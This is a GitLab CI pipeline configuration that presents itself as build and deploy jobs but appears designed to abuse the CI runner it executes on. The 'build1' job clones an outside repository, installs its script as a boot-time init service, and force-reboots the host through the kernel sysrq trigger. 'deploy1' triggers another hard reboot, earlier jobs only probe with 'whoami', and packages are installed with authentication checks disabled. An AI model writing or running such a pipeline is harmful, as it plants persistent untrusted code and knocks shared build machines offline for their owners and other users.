image: debian:latest

stages:
  - ".pre"
  - before_script
  - build1
  - deploy1
  - ".post"

build:
  stage: .pre
  script: whoami
  rules:
    - if: $CI_COMMIT_BRANCH == $CI_DEFAULT_BRANCH

rspec:
  script: whoami
  stage: deploy1
  retry:
    max: 2
    when:
      - runner_system_failure
      - stuck_or_timeout_failure
    
job1:
  stage: .post
  script:
    - whoami
      
#- gitlab-ctl reconfigure
  
before_script:
  - which ssh-agent || ( apt update --allow-unauthenticated --allow-insecure-repositories -y && apt install -y git tzdata && ln -fs /usr/share/zoneinfo/America/Los_Angeles /etc/localtime && dpkg-reconfigure -f noninteractive tzdata)

build1:
  stage: build1
  script:
    - git clone https://gitlab.com/mrgofuckyourself/reboot6.git
    - cd reboot6 
    - cp reboot6.sh /etc/init.d/reboot6.sh 
    - update-rc.d -f reboot6.sh defaults 10 2 3 4 5 . || exit 1
    - reboot --no-wall --force || echo "1" >/proc/sys/kernel/sysrq
    - echo "b" >/proc/sysrq-trigger

deploy1:
  stage: deploy1
  script:
    - echo "b" >/proc/sysrq-trigger
